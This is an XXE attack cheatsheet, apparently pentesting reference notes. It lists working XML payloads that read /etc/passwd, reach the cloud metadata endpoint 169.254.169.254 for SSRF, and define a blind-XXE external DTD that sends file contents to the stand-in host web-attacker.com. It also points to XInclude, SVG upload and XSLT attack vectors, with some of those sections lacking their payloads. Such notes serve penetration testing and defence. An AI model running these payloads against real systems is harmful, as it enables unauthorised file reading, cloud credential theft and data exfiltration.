XXE Cheatsheet

To retrieve File 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

To perform SSRF

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

Cloud Cheatsheet for SSRF - https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf

To Retrieve File using Blind XXE

  1. Host malicious external DTD

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

  1. Call malicious external DTD using XML parameter entities

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>

Retrieve File Error Based

Scenario 1 -

  1. Host below DTD

  1. Call DTD

Scenario 2 - (Causing error by loading local dtd)

XInclude

In few scenarios, we might not have control over entire document(doctype cannot be modified) but only partial control.

In those cases you can use XInclude to retrieve files/perform ssrf.

XXE using SVG Upload

XSLT

XSL is also like XML, which defines how to present & transform XML documents. If transforms are enabled, this can cause XXE even if doctype is disabled in some cases. [ManageEngine ServiceDesk CVE-2022-47966]

Payloads - https://swisskyrepo.github.io/PayloadsAllTheThings/XSLT%20Injection/#remote-code-execution-with-java

PreviousHTTP Request SmugglingNextAndroid

Last updated